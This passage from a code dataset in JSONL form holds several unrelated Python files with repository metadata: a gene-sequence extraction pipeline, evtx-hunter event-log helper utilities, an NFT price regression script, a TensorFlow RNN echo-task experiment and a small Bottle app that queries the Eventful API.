_menu_items\n","repo_name":"k01ek/netbox-bgp","sub_path":"netbox_bgp/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"32"}
+{"seq_id":"6268192961","text":"\"\"\" Scripts with helper functions to download and process gene sequences\n using raw DNA sequences and annotation files.\n\"\"\"\nimport os\nfrom Bio import SeqIO\nfrom . import config, utils\n\n\n# Define Global Vars\nANNOT_SUFFIX_DICT = {'Ensembl': 'gff3',\n 'Refseq': 'gff',\n 'Maize': 'gff3',\n 'Maize_addition': 'gff3',\n 'Maize_nam': 'gff3'}\nGENE_SUFFIX_DICT = {'Ensembl': 'fa',\n 'Refseq': 'fna',\n 'Maize': 'fa',\n 'Maize_addition': 'fa',\n 'Maize_nam': 'fa'}\n\n\n# Helper functions for download data from the selected Database\ndef generate_directories(db_name):\n \"\"\" Creates a list of directories to be added\n Params:\n db_name: str, name of the database to be processed\n \"\"\"\n # Create paths to be added\n db_path = config.data_raw / db_name\n dna_path = db_path / 'dna'\n annot_path = db_path / 'annot'\n processed_db_path = config.data_processed / db_name\n\n for path in [db_path, dna_path, annot_path, processed_db_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef faidx(dna_path, dna_name):\n \"\"\" Adapted from Inari noteobok. Used to extract .fai from .fa file\n Params:\n dna_path: str, directory for the .fa/.fna dna file\n dna_name: str, name for dna .fa/.fna file\n \"\"\"\n exe_str = f\"{config.samtools} faidx {os.path.join(dna_path, dna_name)}\"\n utils.execute(exe_str)\n\n\ndef extract_flanking_region(annot_name, annot_path, db_name):\n \"\"\" Adapted from Inari noteobok. Used to extract the flanking region.\n Generates a .gene.gff3/gff file using the .gff3/gff file.\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n \"\"\"\n # Generate input and output file names\n in_path = os.path.join(annot_path, annot_name)\n suffix = ANNOT_SUFFIX_DICT[db_name]\n out_path = in_path.replace(f\".{suffix}\", f\".gene.{suffix}\")\n exe_str = f\"grep -P '\\tgene\\t' {in_path} > {out_path}\" # -P for ubuntu, -p for linux\n utils.execute(exe_str)\n\n\ndef get_1kbup(dna_name, annot_name, dna_path, annot_path, regulatory_len, db_name):\n \"\"\" Adapted from Inari noteobok. Creates the .gene.1kbup.gff3 file\n using the .gene.gff3 generated using extract_flanking_region.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n regulatory_len: int, length of regulatory region to be extracted\n db_name: str, name of the database to be processed\n \"\"\"\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n\n # Create the exe command to get 1kbup\n exe_str = f\"{config.bedtools} flank -i \"\n exe_str += f\"{os.path.join(annot_path, annot_gene)} \"\n exe_str += f\"-g {os.path.join(dna_path, dna_name)}.fai \"\n exe_str += f\"-l {str(regulatory_len)} \"\n exe_str += \"-r 0 \"\n exe_str += \"-s \"\n exe_str += f\"> {os.path.join(annot_path, annot_1kbup)}\"\n utils.execute(exe_str)\n\n\ndef subtract(dna_name, annot_name, annot_path, db_name):\n ''' Adapted from Inari noteobok. 
Apply Bedtools subtract to subtract genic\n regions of neighbouring genes from the intergenic flanks.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, directory that stores the gff3/gff file\n annot_path: str, directory that stores the gff3/gff file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n\n exe_str = f\"{config.bedtools} subtract -a \" + \\\n os.path.join(annot_path, annot_1kbup)\n exe_str += \" -b \" + os.path.join(annot_path, annot_gene)\n exe_str += \" > \" + os.path.join(annot_path, annot_nov)\n utils.execute(exe_str)\n\n\ndef remove_split_fragments(annot_name, annot_path, db_name):\n ''' Go over the gtf file and if multiple promoter fragments for one gene:\n retain only last one (largest coordinates) in case of positive strand\n retain only first one (smallest coordinates) in case of negative strand\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n db_name: str, name of the database to be processed\n '''\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n\n # Read in all the extracted regions\n with open(os.path.join(annot_path, annot_nov)) as gtf_fh_in:\n fragment_dict = {}\n orientation_dict = {}\n for line in gtf_fh_in:\n line = line.rstrip()\n line_list = line.split('\\t')\n if db_name == 'Ensembl':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Refseq':\n gene_id_temp = line_list[-1].split(';')[1]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Maize':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(':')[1]\n else:\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split('=')[1]\n orientation = line_list[6]\n line_list[2] = gene_id\n orientation_dict[gene_id] = orientation\n if gene_id not in fragment_dict:\n fragment_dict[gene_id] = []\n fragment_dict[gene_id].append(\"\\t\".join(line_list))\n\n # Write out only the retained ones\n with open(os.path.join(annot_path, annot_final), \"w\") as gtf_fh_out:\n for gene_id in fragment_dict:\n if orientation_dict[gene_id] == '+':\n # take fragment with highest coords, which is latest one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][-1]))\n else:\n # orientation == -\n # take fragment with lowest coords, which is first one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][0]))\n\n\ndef extract_sequence(dna_name, annot_name, dna_path, annot_path, save_path, db_name):\n ''' Adapted from Inari noteobok. 
Uses Bedtools getfasta to extract\n the final sequences, w/ extension \".gene.1kbup.nov.final.fa\".\n Params:\n dna_name: str, name for dna .fa file\n annot_name: str, name of the annotation .gff3 file\n dna_path: str, directory for the .fa dna file\n annot_path: str, directory that stores the gff3 file\n save_path: str, directory for the output .fa file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n suffix_g = GENE_SUFFIX_DICT[db_name]\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n\n exe_str = f\"{config.bedtools} getfasta -fi \" + \\\n os.path.join(dna_path, dna_name)\n exe_str += \" -bed \" + os.path.join(annot_path, annot_final)\n exe_str += \" -s -name+ > \"\n exe_str += os.path.join(save_path, dna_final)\n utils.execute(exe_str)\n\n\ndef generate_sequence_for_species(dna_name, annot_name, dna_url, annot_url,\n dna_path, annot_path, save_path, db_name,\n species_name, regulatory_len=1000):\n \"\"\" The main function that chains the above methods together to extract the\n relevant sequesnces from the initial .fa/fna dna file and .gff3/gff\n annotation file downloaded from the Ensembl database.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_url: str, url to download the .fa/fna file\n annot_url: str, url to download the .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n save_path: str, directory for the output .fa/fna file\n db_name: str, name of the database to be processed\n species_name: str, name of species\n regulatory_len: int, length of regulatory region to be extracted\n \"\"\"\n # Generate directories\n generate_directories(db_name)\n\n # Create species-specific directory\n species_name = species_name.strip().lower()\n dna_path_s = dna_path / species_name\n annot_path_s = annot_path / species_name\n save_path = save_path / species_name\n for path in [dna_path_s, annot_path_s, save_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n # Download the raw fa and gff files\n utils.download(dna_url, dna_path_s, db_name, dna_name)\n utils.download(annot_url, annot_path_s, db_name, annot_name)\n\n # Unzip the gz files\n utils.unzip(dna_path_s, dna_name)\n utils.unzip(annot_path_s, annot_name)\n\n # Run Faidx command\n faidx(dna_path_s, dna_name)\n\n # Only extract the flanking regions for the genes\n extract_flanking_region(annot_name, annot_path_s, db_name)\n\n # Get 1kbup file\n get_1kbup(dna_name, annot_name, dna_path_s, annot_path_s, regulatory_len, db_name)\n\n # Bedtools to subtract genic regions of neighbouring genes\n # from the intergenic flanks\n subtract(dna_name, annot_name, annot_path_s, db_name)\n\n # Remove Split fragments\n remove_split_fragments(annot_name, annot_path_s, db_name)\n\n # Extract the resulting sequence\n extract_sequence(dna_name, annot_name, dna_path_s, annot_path_s, save_path, db_name)\n\n # Remove raw sequence files\n utils.clear_folder(dna_path_s, to_continue='y')\n # utils.clear_folder(annot_path_s, to_continue='y')\n\n\ndef load_processed_fa(processed_db_path, dna_name, db_name, species_name):\n \"\"\" Helper function to load sequences with name dna_name.\n Params:\n processed_db_path: db_path within processed data folder\n dna_name: name of the .fa/fna file to be loaded\n 
db_name: str, name of the database to be processed\n species_name: str, name of species\n \"\"\"\n suffix_g = GENE_SUFFIX_DICT[db_name]\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n f_path = os.path.join(processed_db_path, species_name, dna_final)\n fasta_sequences = SeqIO.parse(open(f_path), 'fasta')\n return fasta_sequences\n","repo_name":"benlevyx/florabert","sub_path":"module/inari/gene_db_io.py","file_name":"gene_db_io.py","file_ext":"py","file_size_in_byte":11309,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"}
+{"seq_id":"21087709708","text":"import os\nimport glob\nimport logging\nimport jsonlines\nimport vars\nimport json\nimport pandas as pd\nimport platform\n\n\ndef create_log_fields_string(event, log_fields):\n output_strings = list()\n for field in log_fields:\n if field in event[\"Event\"][\"EventData\"]:\n output_strings.append(field + \":\" + event[\"Event\"][\"EventData\"][field])\n\n return \"\\n\\n\".join(output_strings)\n\n\ndef dict_flatten(in_dict, dict_out=None, parent_key=None, separator=\".\"):\n if dict_out is None:\n dict_out = {}\n\n for k, v in in_dict.items():\n k = f\"{parent_key}{separator}{k}\" if parent_key else k\n if isinstance(v, dict):\n dict_flatten(in_dict=v, dict_out=dict_out, parent_key=k)\n continue\n\n dict_out[k] = v\n\n return dict_out\n\n\ndef normalize_event(event):\n flattened_dict = dict_flatten(event)\n\n event_id = event[\"Event\"][\"System\"][\"EventID\"]\n if type(event_id) != int:\n event[\"Event\"][\"System\"][\"EventID\"] = event_id[\"#text\"]\n\n if \"EventData\" not in event[\"Event\"].keys() or event[\"Event\"][\"EventData\"] is None:\n event[\"Event\"][\"EventData\"] = dict()\n\n for k in event[\"Event\"][\"System\"].keys():\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][\"System\"][k]\n\n for k in event[\"Event\"].keys():\n if k != \"EventData\":\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][k]\n\n if \"UserData\" in event[\"Event\"].keys():\n for k in event[\"Event\"][\"UserData\"].keys():\n event[\"Event\"][\"EventData\"][k] = dict()\n for k_ in event[\"Event\"][\"UserData\"][k].keys():\n event[\"Event\"][\"EventData\"][k][k_] = event[\"Event\"][\"UserData\"][k][k_]\n\n for k, v in flattened_dict.items():\n event[\"Event\"][\"EventData\"][k.split(\".\")[-1]] = v\n\n return event\n\n\ndef retrieve_all_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"interesting_events.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_first_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"first_occurence.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_events():\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n with jsonlines.open(file_info[\"json_dump_filename\"]) as reader:\n for item in reader:\n yield item\n\n\ndef get_description_for_event_id(event_id):\n event_id = int(event_id)\n description_loc = vars.EVENT_ID_MAPPING[vars.EVENT_ID_MAPPING['event_id'] == event_id]\n return ', '.join(description_loc[\"description\"].tolist())\n\n\ndef load_event_id_mappings():\n df = pd.read_csv(vars.EXTERNAL_DIR + \"event_id_mapping.csv\", delimiter=\";\")\n\n # using dictionary to convert specific columns\n convert_dict = {'event_id': int}\n df = df.astype(convert_dict)\n vars.EVENT_ID_MAPPING = df\n\n\ndef get_all_event_channels():\n event_channels = set()\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n event_channels.update(list(file_info[\"event_channel_counts\"].keys()))\n\n return list(event_channels)\n\n\ndef get_recursive_filenames(path, file_suffix):\n filenames = list()\n\n for subdir, dirs, files in os.walk(path):\n for file in files:\n filename = os.path.join(subdir, file)\n if filename.endswith(file_suffix):\n filenames.append(filename)\n\n return filenames\n\n\ndef remove_all_tmp_json_files():\n files = glob.glob(vars.TMP_DIR + \"/evtx_dump/*.json\")\n for f in files:\n os.remove(f)\n\n\ndef setup_logger():\n logger = logging.getLogger('evtx-hunter')\n logger.setLevel(logging.DEBUG)\n\n # 
create console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # add formatter to ch\n ch.setFormatter(formatter)\n\n # add ch to logger\n logger.addHandler(ch)\n\n return logger\n\n\ndef sort_dict(_dict, reverse=False):\n event_summary_list = sorted(_dict.items(), key=lambda x: x[1], reverse=reverse)\n return dict(event_summary_list)\n\n\ndef is_cygwin():\n return platform.system().startswith(\"CYGWIN\")\n\n\ndef is_64_bit():\n return os.uname().machine == \"x86_64\"\n\n\ndef get_cygwin_root():\n return \"/cygwin\" + (\"64/\" if is_64_bit() else \"/\")\n\n\ndef set_cygwin_vars():\n if is_cygwin():\n vars.CYGWIN = True\n vars.CYGWIN_DIR = get_cygwin_root()\n vars.CYGDRIVE_DIR = \"/cygdrive/\"\n else:\n vars.CYGWIN = False\n\n\n# Forwards the original path or corrects it for Cygwin\ndef path_for_exe(path):\n # Path from Cygwin must be corrected before it can be used with .exe\n if vars.CYGWIN:\n # Ensures that the path is absolute \n path = os.path.abspath(path)\n # Path leads to a place within Windows filesystem\n if path.startswith(vars.CYGDRIVE_DIR):\n # Deletes the cygrdive prefix and the drive letter\n path = path[11:]\n # Path leads to a place within Linux filesystem\n else:\n # Adds the Cygwin prefix so .exe can reach the place\n path = vars.CYGWIN_DIR + path\n return path\n","repo_name":"NVISOsecurity/evtx-hunter","sub_path":"app/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"32"}
+{"seq_id":"73296511452","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 28 14:20:05 2023\r\n\r\n@author: efthi\r\n\"\"\"\r\n\r\n#import lightgbm as lgb\r\nimport numpy as np\r\nfrom sklearn.model_selection import cross_val_score, KFold\r\nfrom sklearn.metrics import mean_squared_error\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport lightgbm as lgb\r\n\r\nlabel_encoder = LabelEncoder()\r\n\r\n\r\n# Assuming you have your features (X) and target variable (y) ready\r\nEtherium_price = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\eth_usd_fx_rates.csv\")\r\ntokens_metadate = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_metadata.csv\")\r\ntokens_sales = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_sales.csv\")\r\n\r\n\r\n'''\r\nMerged and sorted given the token \r\nindex firstly and then the timestamp\r\n'''\r\nData = pd.merge(tokens_metadate, tokens_sales, on='token_index')\r\nData = Data.filter(regex='^(?!Unnamed)')\r\n\r\n\r\ncat_features = ['Skin Tone', \"Type\", \"Hair\",\r\n \"Eyewear\", \"Mouth\", \"Headwear\",\r\n \"Facial Hair\", \"Smoking Device\",\r\n \"Other:Earring\", \"Neckwear\",\r\n \"Skin Feature\", \"Other:Medical Mask\",\r\n \"Other:Clown Nose\", \"Trait Count\",\r\n \"rarest_property_name\"]\r\n\r\nfor feature in cat_features:\r\n Data[feature] = Data[feature].astype('category').cat.codes\r\n\r\n\r\nimport re\r\nData = Data.rename(columns = lambda x:re.sub('[^A-Za-z0-9_]+', '', x))\r\n\r\n\r\n\"\"\"\r\ncreate a dataset with the unique nft which \r\nare sold only once so we dont have historic data to train our model\r\n\"\"\"\r\n# Identify duplicate rows\r\nduplicates = Data.duplicated(subset= \"token_index\", keep=False)\r\ndf_duplicates = Data[duplicates]\r\ndf_unique = Data[~duplicates]\r\n\r\n\r\n'''\r\nThis \"test\" dataset contains only the token \r\nwith the last sold price given the timestamp plus the unique tokens\r\nwhich might be sold only once\r\n'''\r\n# Sort the dataframe by 'timestamp' in descending order\r\ndf_sorted = Data.sort_values(by='timestamp', ascending=False)\r\n\r\n# Drop duplicates based on 'token_index' while keeping the row with the largest 'timestamp'\r\nTest_data = df_sorted.drop_duplicates(subset='token_index', keep='first')\r\n\r\nX_test = Test_data.drop(columns=[\"eth\",'usd'])\r\nY_test = Test_data.loc[:, Test_data.columns == 'eth']\r\n\r\n\r\n\r\n'''\r\nKeep the data which have been sold more than once.\r\n'''\r\nTrain_data_x = df_sorted[~df_sorted['timestamp'].isin(Test_data['timestamp'])]\r\nTrain_data = Train_data_x[~Train_data_x['token_index'].isin(df_unique['token_index'])]\r\n\r\nX_train = Train_data.drop(columns=[\"eth\",'usd'])\r\ny_train = Train_data.loc[:, Train_data.columns == 'eth']\r\n\r\n\r\n\r\n# Create a LightGBM dataset\r\ntrain_data = lgb.Dataset(X_train, label=y_train)\r\n\r\n\r\nparams = {\r\n 'boosting_type': 'gbdt',\r\n 'objective': 'regression',\r\n 'metric': 'mse',\r\n 'num_leaves': 100,\r\n 'learning_rate': 0.05,\r\n 'feature_fraction': 0.9,\r\n 'bagging_fraction': 0.8,\r\n 'bagging_freq': 5,\r\n 'verbose': 0\r\n}\r\n\r\n# Train the model\r\nnum_rounds = 100\r\nmodel = lgb.train(params, train_data, num_rounds)\r\n\r\n# Make predictions on the testing set\r\ny_pred = model.predict(X_test)\r\n\r\n# Evaluate the model\r\nmse = mean_squared_error(Y_test, y_pred)\r\nprint('Mean Squared Error:', 
mse)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"EfthyvoulosDrousiotis/NFT_valuation","sub_path":"NFT_valuations.py","file_name":"NFT_valuations.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34036293525","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\ntruncatedBackpropLength = 5\r\nnumOfInputNodes = 1\r\nnumOfOutputNodes = 2\r\n\r\nnumOfHiddenNodes = 6\r\n\r\nbatchSize = 4\r\n\r\nrandScaler = 0.01\r\n\r\n\r\n\r\nsess = tf.Session()\r\n\r\nx_batch = tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfInputNodes])\r\ny_batch = tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfOutputNodes])\r\n\r\n\r\nx_list = []\r\n\r\nW2 = tf.Variable(np.random.rand(numOfInputNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\nb_hidden = tf.Variable(tf.zeros([numOfHiddenNodes]))\r\n\r\nW3 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\ncontext = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nW4 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfOutputNodes)*randScaler, dtype=tf.float32)\r\nb_output = tf.Variable(tf.zeros([numOfOutputNodes]))\r\n\r\ncross_entropy_sum = tf.Variable(tf.zeros([1]))\r\naccuracy_list = []\r\n\r\n\r\nfor seriesStep in range (truncatedBackpropLength):\r\n xTemp = tf.squeeze(tf.slice(x_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n y_label = tf.squeeze(tf.slice(y_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n\r\n if (numOfInputNodes == 1):\r\n \txTemp = tf.reshape(xTemp, [batchSize, numOfInputNodes])\r\n \ty_label = tf.reshape(y_label, [batchSize, numOfOutputNodes])\r\n\r\n x_list.append(xTemp)\r\n\r\n\r\n \r\n hidden = tf.matmul(xTemp,W2) + tf.matmul(context,W3) + b_hidden\r\n \r\n # context = hidden\r\n hidden_clipped = tf.nn.tanh(hidden) \r\n context = hidden_clipped\r\n output = tf.matmul(hidden_clipped, W4) + b_output\r\n \r\n\r\n y_predicted = tf.nn.softmax(output)\r\n\r\n \r\n correct_prediction = tf.equal(tf.argmax(y_predicted,1), tf.argmax(y_label,1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n accuracy_list.append(accuracy)\r\n \r\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_label * tf.log(y_predicted), reduction_indices=[1]))\r\n cross_entropy_sum = cross_entropy_sum + cross_entropy\r\n\r\ncontext_final = context\r\ncross_final = cross_entropy_sum\r\nLEARNING_RATE = 0.05\r\ntraining = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cross_entropy_sum)\r\n\r\nx_final = x_list\r\naccuracy_final = accuracy_list\r\n\r\n\r\n \r\n\r\ninit = tf.global_variables_initializer()\r\nsess.run(init)\r\n\r\nimport numpy as np\r\n\r\n# Start= [1,0,0,0,0,0,0]\r\n# Coffee= [0,1,0,0,0,0,0];\r\n# Tea= [0,0,1,0,0,0,0];\r\n# Water= [0,0,0,1,0,0,0];\r\n# Cream= [0,0,0,0,1,0,0];\r\n# Sugar= [0,0,0,0,0,1,0];\r\n# Stir= [0,0,0,0,0,0,1];\r\n\r\n\r\n# # %%% output; this is the teacher output \r\n# Coffeeout= [1,0,0,0,0,0,0,0]; \r\n# Teaout= [0,1,0,0,0,0,0,0];\r\n# Waterout= [0,0,1,0,0,0,0,0];\r\n# Creamout= [0,0,0,1,0,0,0,0];\r\n# Sugarout= [0,0,0,0,1,0,0,0];\r\n# Stirout= [0,0,0,0,0,1,0,0];\r\n# Coffeebev= [0,0,0,0,0,0,1,0];\r\n# Teabev= [0,0,0,0,0,0,0,1];\r\n\r\n# inputBatch = []\r\n# outputBatch = []\r\n\r\n# # %%% Seq1 tea water second \r\n\r\n# TWInp=[Start,Tea,Water,Stir,Sugar,Stir]\r\n# TWOut=[Teaout,Waterout,Stirout,Sugarout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TWInp)\r\n# outputBatch.append(TWOut)\r\n\r\n# # %%% Seq2 tea water second \r\n\r\n# TSInp=[Start,Tea,Sugar,Stir,Water,Stir]\r\n# TSOut=[Teaout,Sugarout,Stirout,Waterout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TSInp)\r\n# outputBatch.append(TSOut)\r\n\r\n\r\n# # %%% Seq3 coffee water first \r\n\r\n# 
CWInp=[Start,Coffee,Water,Stir,Cream,Stir]\r\n# CWOut=[Coffeeout,Waterout,Stirout,Creamout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CWInp)\r\n# outputBatch.append(CWOut)\r\n\r\n\r\n# # %%% Seq4 coffee water second\r\n\r\n# CCInp=[Start,Coffee,Cream,Stir,Water,Stir]\r\n# CCOut=[Coffeeout,Creamout,Stirout,Waterout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CCInp)\r\n# outputBatch.append(CCOut)\r\n\r\n\r\ntotal_series_length = 50000\r\necho_step = truncatedBackpropLength\r\nbatch_length = int(total_series_length/batchSize)\r\n\r\ndef generateData():\r\n\tx = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))\r\n\ty = np.roll(x, echo_step)\r\n\ty[0:echo_step] = 0\r\n\r\n\ty_hot = [(1-yTemp)*[1,0] + yTemp*[0,1] for yTemp in y]\r\n\r\n\r\n\ty_hot_list = []\r\n\tfor i in range(batchSize):\r\n\t\ty_hot_Temp = y_hot[i*batch_length:i*batch_length+batch_length]\r\n\t\ty_hot_list.append(y_hot_Temp)\r\n\r\n\tx = x.reshape((batchSize, batch_length)) # The first index changing slowest, subseries as rows\r\n\t# y_hot = y_hot.reshape((batchSize, batch_length))\r\n\r\n\treturn (x, y_hot_list)\r\n\r\n\r\nx, y = generateData()\r\n\r\nprint('Size of X: ' + str(len(x)) + '*' + str(len(x[0])))\r\nprint('Size of Y: ' + str(len(y)) + '*' + str(len(y[0])))\r\n\r\nimport random\r\n\r\nTRAIN_STEPS = 50000\r\nweightList1 = []\r\nweightList2 = []\r\nweightList3 = []\r\nweightList4 = []\r\n# with sess.as_default():\r\nfor i in range(TRAIN_STEPS):\r\n\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\t# wrap the index so the slice stays inside the series: TRAIN_STEPS (50000) exceeds batch_length (12500)\r\n\trandIndex = i%(batch_length-truncatedBackpropLength) + truncatedBackpropLength\r\n\r\n\tx_train = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\ty_train = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\tx_train = x_train.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t# y_train = y_train.reshape((batchSize, truncatedBackpropLength, 2))\r\n\r\n\r\n\tsess.run(training, feed_dict={x_batch: x_train, y_batch: y_train})\r\n\r\n\tif (i%100==0):\r\n\t\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\t\trandIndex = i%(batch_length-truncatedBackpropLength) + truncatedBackpropLength # same wrap-around as above\r\n\r\n\t\tx_test = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\t\ty_test = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\t\tx_test = x_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t\t# y_test = y_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\r\n\t\t# print('input: ')\r\n\t\t# print(x_test)\r\n\r\n\t\tprint('Training Step: ' + str(i) + ' Accuracy = ' + str(sess.run(accuracy_final, feed_dict={x_batch: x_test, y_batch: y_test})) + ' Loss = ' + str(sess.run(cross_final, {x_batch: x_test, y_batch: y_test}))) # evaluate on the freshly sliced test batch, not the training batch\r\n\t\t\r\n\t\tb = sess.run(W3)\r\n\t\tweightList1.append(b[0])\r\n\t\tweightList2.append(b[1])\r\n\r\n\t\tc = sess.run(W4)\r\n\t\tweightList3.append(c[2])\r\n\t\tweightList4.append(c[3])\r\n\t\t# print(b[:,6:8])\r\n\r\n\t# context = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nimport matplotlib.pyplot as plt \r\nplt.figure(1)\r\nplt.subplot(411)\r\nplt.plot(weightList1)\r\nplt.subplot(412)\r\nplt.plot(weightList2)\r\nplt.subplot(413)\r\nplt.plot(weightList3)\r\nplt.subplot(414)\r\nplt.plot(weightList4)\r\nplt.ylabel('some 
numbers')\r\nplt.show()","repo_name":"dshahnazian/Recurrent-neural-network","sub_path":"Danesh_RNN_General.py","file_name":"Danesh_RNN_General.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
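A quick way to sanity-check the echo-task data generated in the record above is to confirm that each one-hot label row is just the input shifted by echo_step; a minimal standalone sketch of that check:

import numpy as np

echo_step = 5
x = np.random.choice(2, 20)
y = np.roll(x, echo_step)
y[:echo_step] = 0            # the first echo_step outputs have nothing to echo yet
y_hot = np.eye(2)[y]         # one-hot rows: [1,0] for class 0, [0,1] for class 1
assert (y[echo_step:] == x[:-echo_step]).all()
print(y_hot[:3])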
+{"seq_id":"6055658836","text":"import bottle\nfrom bottle import Bottle,route,run,request,template,static_file\nimport json\nfrom sys import argv\nimport requests\n@route('/',method=\"get\")\ndef eventfull():\n return template ('template.tpl')\n@route('/eventfull',method=\"post\")\ndef eventfull():\n ciudad = request.forms.get('ciudad')\n tipo = request.forms.get('tipo')\n a=open(\".key_eventfull.txt\",\"r\")\n key=a.readline()\n payload={\"app_key\":key, \"location\": ciudad, \"keywords\":tipo}\n r=requests.get(\"http://api.eventful.com/json/events/search?keywords=\"+tipo+\"&location=\"+ciudad+\"&app_key=\"+key)\n if r.status_code == 200:\n js=json.loads(r.text)\n titulo=[]\n empezar=[]\n lugar=[]\n for i in js[\"events\"][\"event\"]:\n titulo.append(i[\"title\"])\n empezar.append(i[\"start_time\"])\n lugar.append(i[\"venue_name\"])\n return template('template2.tpl', titulo=titulo, empezar=empezar, lugar=lugar, ciudad=ciudad, tipo=tipo)\n\n@route('/static/')\ndef server_static(filepath):\n\treturn static_file(filepath, root='static')\n\nif __name__ == 